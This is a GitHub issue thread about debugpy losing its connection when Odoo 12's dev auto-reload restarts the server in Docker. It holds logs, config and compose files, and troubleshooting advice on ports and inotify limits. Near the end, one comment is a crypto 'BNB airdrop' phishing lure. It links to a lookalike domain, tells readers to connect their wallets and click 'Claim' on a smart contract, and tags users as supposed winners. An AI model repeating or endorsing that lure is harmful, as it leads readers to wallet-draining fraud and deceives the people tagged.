### ISSUE TITLE
Error when using the reload dev feature in odoo 12.0

### ISSUE THREAD

**Issue by tonyctalope** [tosolini/odoo-vscode#1]
Maybe the reload dev feature is not compatible with debugpy ? Im using odoo in a docker.

```
2022-12-23 10:16:38,315 1 INFO ? odoo.service.server: Initiating server reload
2022-12-23 10:16:38,474 1 DEBUG ? odoo.service.server: current thread: <_MainThread(MainThread, started 140452668991296)>
2022-12-23 10:16:38,476 1 DEBUG ? odoo.service.server: process <_MainThread(MainThread, started 140452668991296)> (False)
2022-12-23 10:16:38,477 1 DEBUG ? odoo.service.server: process <InotifyBuffer(Thread-8, started daemon 140452560815872)> (True)
2022-12-23 10:16:38,478 1 DEBUG ? odoo.service.server: process <InotifyEmitter(Thread-5, started daemon 140452477007616)> (True)
2022-12-23 10:16:38,478 1 DEBUG ? odoo.service.server: process <InotifyBuffer(Thread-9, started daemon 140452468614912)> (True)
2022-12-23 10:16:38,478 1 DEBUG ? odoo.service.server: process <InotifyEmitter(Thread-2, started daemon 140452460222208)> (True)
2022-12-23 10:16:38,478 1 DEBUG ? odoo.service.server: process <InotifyBuffer(Thread-10, started daemon 140452451829504)> (True)
2022-12-23 10:16:38,478 1 DEBUG ? odoo.service.server: process <InotifyEmitter(Thread-4, started daemon 140452443436800)> (True)
2022-12-23 10:16:38,478 1 DEBUG ? odoo.service.server: process <InotifyBuffer(Thread-11, started daemon 140452435044096)> (True)
2022-12-23 10:16:38,479 1 DEBUG ? odoo.service.server: process <InotifyEmitter(Thread-7, started daemon 140452426651392)> (True)
2022-12-23 10:16:38,479 1 DEBUG ? odoo.service.server: process <InotifyBuffer(Thread-12, started daemon 140452418258688)> (True)
2022-12-23 10:16:38,479 1 DEBUG ? odoo.service.server: process <InotifyEmitter(Thread-3, started daemon 140452409865984)> (True)
2022-12-23 10:16:38,479 1 DEBUG ? odoo.service.server: process <InotifyBuffer(Thread-13, started daemon 140452401473280)> (True)
2022-12-23 10:16:38,479 1 DEBUG ? odoo.service.server: process <InotifyEmitter(Thread-6, started daemon 140452393080576)> (True)
2022-12-23 10:16:38,479 1 DEBUG ? odoo.service.server: process <InotifyObserver(Thread-1, started daemon 140452384687872)> (True)
2022-12-23 10:16:38,479 1 DEBUG ? odoo.service.server: process <Thread(odoo.service.httpd, stopped daemon 140452376295168)> (True)
2022-12-23 10:16:38,479 1 DEBUG ? odoo.service.server: process <Thread(odoo.service.cron.cron0, started daemon 140452367902464)> (True)
2022-12-23 10:16:38,480 1 DEBUG ? odoo.service.server: process <Thread(odoo.service.cron.cron1, started daemon 140452359509760)> (True)
2022-12-23 10:16:38,480 1 DEBUG ? odoo.service.server: process <Thread(odoo.addons.bus.models.bus.Bus, started daemon 140452328044288)> (True)
2022-12-23 10:16:38,480 1 DEBUG ? odoo.service.server: process <Thread(openerp.longpolling.request.140452257494784, started daemon 140452257494784)> (True)
2022-12-23 10:16:38,480 1 DEBUG ? odoo.service.server: --
0.07s - Could not connect to 127.0.0.1: 33017
Traceback (most recent call last):
  File "/usr/local/lib/python3.7/dist-packages/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_comm.py", line 493, in start_client
    s.connect((host, port))
ConnectionRefusedError: [Errno 111] Connection refused
Could not connect to 127.0.0.1: 33017
Traceback (most recent call last):
  File "/usr/local/lib/python3.7/dist-packages/debugpy/_vendored/pydevd/pydevd.py", line 3473, in main
    debugger.connect(host, port)
  File "/usr/local/lib/python3.7/dist-packages/debugpy/_vendored/pydevd/pydevd.py", line 1418, in connect
    s = start_client(host, port)
  File "/usr/local/lib/python3.7/dist-packages/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_comm.py", line 493, in start_client
    s.connect((host, port))
ConnectionRefusedError: [Errno 111] Connection refused
```

**Comment by tosolini** [comment]
Hello, the problem you are facing is a Connection error, your VScode cannot resolve your localhost or port

> Could not connect to 127.0.0.1: 33017

with Docker you must expose the port from container to host. Look this article

https://www.cloudbees.com/blog/docker-expose-port-what-it-means-and-what-it-doesnt-mean

**Comment by tonyctalope** [comment]
I launched my odoo with a `debugpy --listen 0.0.0.0:5678 /usr/bin/odoo --dev all`. Everything works perfectly, debug and xml dev feature until I use the reload dev feature, it try to connect to 127.0.0.1: XXXXX with XXXXX a random port. This time it was 33017, but everytime it's a different one. I need to open all my ports ?

**Comment by tosolini** [comment]
The app i create does not need to launch debugpy on CLI. The idea is installing the app, activate, when contacts are loaded (usually by default on odoo) open debugpy listening on port 5678 automatically. 

Anyway, you also get some inotify buffer error, which means you must increase the value of 

`fs.inotify.max_user_watches=524288`

in /etc/sysctl.conf

But this conflict with port behavior change, maybe, the inotify crash and restart odoo (in the first post you can see odoo daemon stop and start at some point) without debugpy. Try enlarging the buffer value

**Comment by tonyctalope** [comment]
I just use the CLI to debug faster, I'll use your app when the debug will be done.

I'm in debian-buster-slim btw. Here's my [dockerfile](https://github.com/tonyctalope/docker_odoo12-buster/blob/main/Dockerfile), in case you need it.
I don't have a `/etc/sysctl.conf` file, so I tried to create one with `fs.inotify.max_user_watches=524288` parameter. Then I restart my container and tried the same process : using the dev reload feature. I basically got the same error, maybe it doesn't get my parameter.

```
autoreload: python code updated, autoreload activated
Initiating server reload
 current thread: <_MainThread(MainThread, started 140614176618240)>
 process <_MainThread(MainThread, started 140614176618240)> (False)
 process <WriterThread(pydevd.Writer, started daemon 140614114518784)> (True)
 process <InotifyEmitter(Thread-11, started daemon 140613413844736)> (True)
 process <InotifyBuffer(Thread-17, started daemon 140613422499584)> (True)
 process <InotifyEmitter(Thread-12, started daemon 140613430892288)> (True)
 process <InotifyEmitter(Thread-8, started daemon 140613456070400)> (True)
 process <InotifyBuffer(Thread-16, started daemon 140613439284992)> (True)
 process <_TimeoutThread(Thread-5, started daemon 140614089340672)> (True)
 process <InotifyBuffer(Thread-15, started daemon 140613447677696)> (True)
 process <PyDBCommandThread(pydevd.CommandThread, started daemon 140614097733376)> (True)
 process <ReaderThread(pydevd.Reader, started daemon 140614106126080)> (True)
 process <Thread(odoo.service.cron.cron1, started daemon 140613329131264)> (True)
 process <Thread(odoo.service.cron.cron0, started daemon 140613337523968)> (True)
 process <InotifyObserver(Thread-7, started daemon 140613354309376)> (True)
 process <InotifyBuffer(Thread-18, started daemon 140613405452032)> (True)
 process <InotifyEmitter(Thread-13, started daemon 140613362702080)> (True)
 process <InotifyEmitter(Thread-10, started daemon 140613380273920)> (True)
 process <InotifyBuffer(Thread-14, started daemon 140613865432832)> (True)
 process <CheckAliveThread(pydevd.CheckAliveThread, started 140613873825536)> (False)
 join and sleep
 process <InotifyBuffer(Thread-19, started daemon 140613388666624)> (True)
 process <InotifyEmitter(Thread-9, started daemon 140613397059328)> (True)
 --
Could not connect to 127.0.0.1: 44767
Traceback (most recent call last):
  File "/usr/local/lib/python3.5/dist-packages/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_comm.py", line 507, in start_client
    s.connect((host, port))
ConnectionRefusedError: [Errno 111] Connection refused
Could not connect to 127.0.0.1: 44767
Traceback (most recent call last):
  File "/usr/local/lib/python3.5/dist-packages/debugpy/_vendored/pydevd/pydevd.py", line 3325, in main
    debugger.connect(host, port)
  File "/usr/local/lib/python3.5/dist-packages/debugpy/_vendored/pydevd/pydevd.py", line 1380, in connect
    s = start_client(host, port)
  File "/usr/local/lib/python3.5/dist-packages/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_comm.py", line 507, in start_client
    s.connect((host, port))
ConnectionRefusedError: [Errno 111] Connection refused
```

Edit : Apparently I updated the parameter well : 
```
root@e345c986b1ba:/proc/sys/fs/inotify# cat max_user_watches
524288
```

**Comment by tosolini** [comment]
Try force with CLI

`sudo sysctl fs.inotify.max_user_watches=600000`

**Comment by tonyctalope** [comment]
```
root@e345c986b1ba:/# sysctl
bash: sysctl: command not found
```

**Comment by tonyctalope** [comment]
I installed it with `apt-get update && apt-get install procps`.
Then I got : 
```
root@e345c986b1ba:/# sysctl fs.inotify.max_user_watches=600000
sysctl: setting key "fs.inotify.max_user_watches": Read-only file system
root@e345c986b1ba:/# sysctl fs.inotify.max_user_watches
fs.inotify.max_user_watches = 524288
```

**Comment by tosolini** [comment]
Ok the 500 thousand i think is enough. I hope odoo is not in worke's mode, so in /etc/odoo/odoo.conf or whatever is the conf, workers = 0, is it?

**Comment by tonyctalope** [comment]
Here's my odoo conf file : 
```
[options]
db_host = db
db_user = odoo
db_password = odoo
admin_passwd = odoo
addons_path = /mnt/extra-addons/asr,/mnt/extra-addons/oca,/mnt/extra-addons/temp,/mnt/extra-addons/appstore
log_db = False
log_db_level = warning
log_level  = debug
logfile = None
```
I added `workers = 0` in it, but it doesn't change the error.
Here the log of a complete test :
```
docker_odoo-db-1       |
docker_odoo-db-1       | PostgreSQL Database directory appears to contain a database; Skipping initialization
docker_odoo-db-1       |
docker_odoo-db-1       | 2022-12-27 10:26:39.726 UTC [1] LOG:  starting PostgreSQL 12.2 on x86_64-pc-linux-musl, compiled by gcc (Alpine 9.2.0) 9.2.0, 64-bit
docker_odoo-db-1       | 2022-12-27 10:26:39.726 UTC [1] LOG:  listening on IPv4 address "0.0.0.0", port 5432
docker_odoo-db-1       | 2022-12-27 10:26:39.726 UTC [1] LOG:  listening on IPv6 address "::", port 5432
docker_odoo-db-1       | 2022-12-27 10:26:39.732 UTC [1] LOG:  listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432"
docker_odoo-db-1       | 2022-12-27 10:26:39.751 UTC [21] LOG:  database system was shut down at 2022-12-27 10:26:34 UTC
docker_odoo-db-1       | 2022-12-27 10:26:39.762 UTC [1] LOG:  database system is ready to accept connections
docker_odoo-web-1      | 2022-12-27 10:26:41,953 1 DEBUG ? odoo.netsvc: logger level set: "odoo.http.rpc.request:INFO"
docker_odoo-web-1      | 2022-12-27 10:26:41,955 1 DEBUG ? odoo.netsvc: logger level set: "odoo.http.rpc.response:INFO"
docker_odoo-web-1      | 2022-12-27 10:26:41,955 1 DEBUG ? odoo.netsvc: logger level set: ":INFO"
docker_odoo-web-1      | 2022-12-27 10:26:41,955 1 DEBUG ? odoo.netsvc: logger level set: "odoo:DEBUG"
docker_odoo-web-1      | 2022-12-27 10:26:41,955 1 DEBUG ? odoo.netsvc: logger level set: "odoo.sql_db:INFO"
docker_odoo-web-1      | 2022-12-27 10:26:41,955 1 DEBUG ? odoo.netsvc: logger level set: ":INFO"
docker_odoo-web-1      | 2022-12-27 10:26:41,956 1 INFO ? odoo: Odoo version 12.0-20210921
docker_odoo-web-1      | 2022-12-27 10:26:41,956 1 INFO ? odoo: Using configuration file at /etc/odoo/odoo.conf
docker_odoo-web-1      | 2022-12-27 10:26:41,956 1 INFO ? odoo: addons paths: ['/var/lib/odoo/.local/share/Odoo/addons/12.0', '/mnt/extra-addons/asr', '/mnt/extra-addons/oca', '/mnt/extra-addons/temp', '/mnt/extra-addons/appstore', '/usr/lib/python3/dist-packages/odoo/addons']
docker_odoo-web-1      | 2022-12-27 10:26:41,957 1 INFO ? odoo: database: odoo@db:default
docker_odoo-web-1      | 2022-12-27 10:26:42,120 1 INFO ? odoo.addons.base.models.ir_actions_report: Will use the Wkhtmltopdf binary at /usr/local/bin/wkhtmltopdf
docker_odoo-web-1      | 2022-12-27 10:26:42,213 1 DEBUG ? odoo.tools.translate: translation went wrong for "'Selecting the "Warning" option will notify user with the message, Selecting "Blocking Message" will throw an exception with the message and block the flow. The Message has to be written in the next field.'", skipped
docker_odoo-web-1      | 2022-12-27 10:26:42,268 1 INFO ? odoo.service.server: Watching addons folder /var/lib/odoo/.local/share/Odoo/addons/12.0
docker_odoo-web-1      | 2022-12-27 10:26:42,269 1 INFO ? odoo.service.server: Watching addons folder /mnt/extra-addons/asr
docker_odoo-web-1      | 2022-12-27 10:26:42,269 1 INFO ? odoo.service.server: Watching addons folder /mnt/extra-addons/oca
docker_odoo-web-1      | 2022-12-27 10:26:42,269 1 INFO ? odoo.service.server: Watching addons folder /mnt/extra-addons/temp
docker_odoo-web-1      | 2022-12-27 10:26:42,270 1 INFO ? odoo.service.server: Watching addons folder /mnt/extra-addons/appstore
docker_odoo-web-1      | 2022-12-27 10:26:42,270 1 INFO ? odoo.service.server: Watching addons folder /usr/lib/python3/dist-packages/odoo/addons
docker_odoo-web-1      | 2022-12-27 10:26:42,605 1 INFO ? odoo.service.server: AutoReload watcher running with watchdog
docker_odoo-web-1      | 2022-12-27 10:26:42,606 1 DEBUG ? odoo.service.server: Setting signal handlers
docker_odoo-web-1      | 2022-12-27 10:26:42,611 1 INFO ? odoo.service.server: HTTP service (werkzeug) running on ab199272f0dc:8069
docker_odoo-web-1      | 2022-12-27 10:26:42,612 1 DEBUG ? odoo.service.server: cron0 started!
docker_odoo-web-1      | 2022-12-27 10:26:42,613 1 DEBUG ? odoo.service.server: cron1 started!
docker_odoo-pgadmin-1  | [2022-12-27 10:26:43 +0000] [1] [INFO] Starting gunicorn 20.1.0
docker_odoo-pgadmin-1  | [2022-12-27 10:26:43 +0000] [1] [INFO] Listening at: http://[::]:5050 (1)
docker_odoo-pgadmin-1  | [2022-12-27 10:26:43 +0000] [1] [INFO] Using worker: gthread
docker_odoo-pgadmin-1  | [2022-12-27 10:26:43 +0000] [80] [INFO] Booting worker with pid: 80
docker_odoo-web-1      | 2022-12-27 10:26:47,243 1 INFO ? odoo.service.server: autoreload: python code updated, autoreload activated
docker_odoo-web-1      | 2022-12-27 10:26:47,244 1 INFO ? odoo.service.server: Initiating server reload
docker_odoo-web-1      | 2022-12-27 10:26:47,618 1 DEBUG ? odoo.service.server: current thread: <_MainThread(MainThread, started 140497736279808)>
docker_odoo-web-1      | 2022-12-27 10:26:47,619 1 DEBUG ? odoo.service.server: process <_MainThread(MainThread, started 140497736279808)> (False)
docker_odoo-web-1      | 2022-12-27 10:26:47,620 1 DEBUG ? odoo.service.server: process <WriterThread(pydevd.Writer, started daemon 140497674180352)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,620 1 DEBUG ? odoo.service.server: process <ReaderThread(pydevd.Reader, started daemon 140497665787648)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,620 1 DEBUG ? odoo.service.server: process <Thread(odoo.service.cron.cron0, started daemon 140496906176256)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,620 1 DEBUG ? odoo.service.server: process <InotifyObserver(Thread-7, started daemon 140496914568960)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,620 1 DEBUG ? odoo.service.server: process <InotifyEmitter(Thread-9, started daemon 140496922961664)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,620 1 DEBUG ? odoo.service.server: process <PyDBCommandThread(pydevd.CommandThread, started daemon 140497657394944)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,620 1 DEBUG ? odoo.service.server: process <Thread(odoo.service.cron.cron1, started daemon 140496889128704)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,621 1 DEBUG ? odoo.service.server: process <InotifyEmitter(Thread-8, started daemon 140496948139776)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,621 1 DEBUG ? odoo.service.server: process <InotifyEmitter(Thread-12, started daemon 140496956532480)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,621 1 DEBUG ? odoo.service.server: process <InotifyEmitter(Thread-13, started daemon 140496990103296)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,621 1 DEBUG ? odoo.service.server: process <InotifyBuffer(Thread-17, started daemon 140496964925184)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,621 1 DEBUG ? odoo.service.server: process <InotifyEmitter(Thread-10, started daemon 140496973317888)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,621 1 DEBUG ? odoo.service.server: process <InotifyBuffer(Thread-15, started daemon 140496999282432)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,621 1 DEBUG ? odoo.service.server: process <InotifyBuffer(Thread-14, started daemon 140497423161088)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,622 1 DEBUG ? odoo.service.server: process <CheckAliveThread(pydevd.CheckAliveThread, started 140497431553792)> (False)
docker_odoo-web-1      | 2022-12-27 10:26:47,622 1 DEBUG ? odoo.service.server: join and sleep
docker_odoo-web-1      | 2022-12-27 10:26:47,673 1 DEBUG ? odoo.service.server: process <_TimeoutThread(Thread-5, started daemon 140497439946496)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,674 1 DEBUG ? odoo.service.server: process <InotifyBuffer(Thread-18, started daemon 140496981710592)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,674 1 DEBUG ? odoo.service.server: process <InotifyEmitter(Thread-11, started daemon 140497007675136)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,674 1 DEBUG ? odoo.service.server: process <InotifyBuffer(Thread-16, started daemon 140497016067840)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,674 1 DEBUG ? odoo.service.server: process <InotifyBuffer(Thread-19, started daemon 140496931354368)> (True)
docker_odoo-web-1      | 2022-12-27 10:26:47,674 1 DEBUG ? odoo.service.server: --
docker_odoo-web-1      | Could not connect to 127.0.0.1: 39081
docker_odoo-web-1      | Traceback (most recent call last):
docker_odoo-web-1      |   File "/usr/local/lib/python3.5/dist-packages/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_comm.py", line 507, in start_client
docker_odoo-web-1      |     s.connect((host, port))
docker_odoo-web-1      | ConnectionRefusedError: [Errno 111] Connection refused
docker_odoo-web-1      | Could not connect to 127.0.0.1: 39081
docker_odoo-web-1      | Traceback (most recent call last):
docker_odoo-web-1      |   File "/usr/local/lib/python3.5/dist-packages/debugpy/_vendored/pydevd/pydevd.py", line 3325, in main
docker_odoo-web-1      |     debugger.connect(host, port)
docker_odoo-web-1      |   File "/usr/local/lib/python3.5/dist-packages/debugpy/_vendored/pydevd/pydevd.py", line 1380, in connect
docker_odoo-web-1      |     s = start_client(host, port)
docker_odoo-web-1      |   File "/usr/local/lib/python3.5/dist-packages/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_comm.py", line 507, in start_client
docker_odoo-web-1      |     s.connect((host, port))
docker_odoo-web-1      | ConnectionRefusedError: [Errno 111] Connection refused
docker_odoo-web-1 exited with code 1
```

My docker-compose.yml file, just in case: 
```
version: "3.8"

services:
  web:
    build: .
    command: /usr/bin/python3 -m debugpy --listen 0.0.0.0:5678 /usr/bin/odoo --dev all
    networks:
      - app-net
    depends_on:
      - db
    ports:
      - 8069:8069
      - 5678:5678
    volumes:
      - ./addons/asr:/mnt/extra-addons/asr
      - ./addons/oca:/mnt/extra-addons/oca
      - ./addons/temp:/mnt/extra-addons/temp
      - ./addons/appstore:/mnt/extra-addons/appstore
      - web-odoo:/var/lib/odoo
      - ./conf:/etc/odoo

  db:
    image: postgres:12.2-alpine
    networks:
      - app-net
      - db-net
    environment:
      - POSTGRES_DB=postgres
      - POSTGRES_PASSWORD=odoo
      - POSTGRES_USER=odoo
      - PGDATA=/var/lib/postgresql/data/pgdata
    volumes:
      - db-data:/var/lib/postgresql/data

  pgadmin:
    image: dpage/pgadmin4:6.0
    networks:
      - db-net
    environment:
      - PGADMIN_DEFAULT_EMAIL=odoo
      - PGADMIN_DEFAULT_PASSWORD=odoo
      - PGADMIN_LISTEN_PORT=5050
    ports:
      - 5050:5050
    volumes:
      - pgadmin-data:/var/lib/pgadmin
      - ./pgadmin/servers.json:/pgadmin4/servers.json


volumes:
  db-data:
  pgadmin-data:
  web-odoo:

networks:
  app-net:
  db-net:
```

**Comment by tosolini** [comment]
The conf lookalike ok.. i dont know about command in docker-compose because the second ":" may confuse the script, but if the first start is working there is something else.

I dont know... i gonna clone your code and try when i have spare time

**Comment by tonyctalope** [comment]
Thank you a lot :)

That's my final dockerfile in case you have time to try:
```
FROM tonyctalope/odoo12-buster:22-12-12

USER root

RUN pip3 install debugpy

USER odoo
```

**Comment by backend-jhjoo** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @NaderNasr, @Mini-Ware, @QwajoNash, @tobocop2, @zhanglx1988, @lyran159, @liudonghua123

**Comment by lyran159** [comment]
您好，您的邮件我已收到,谢谢。
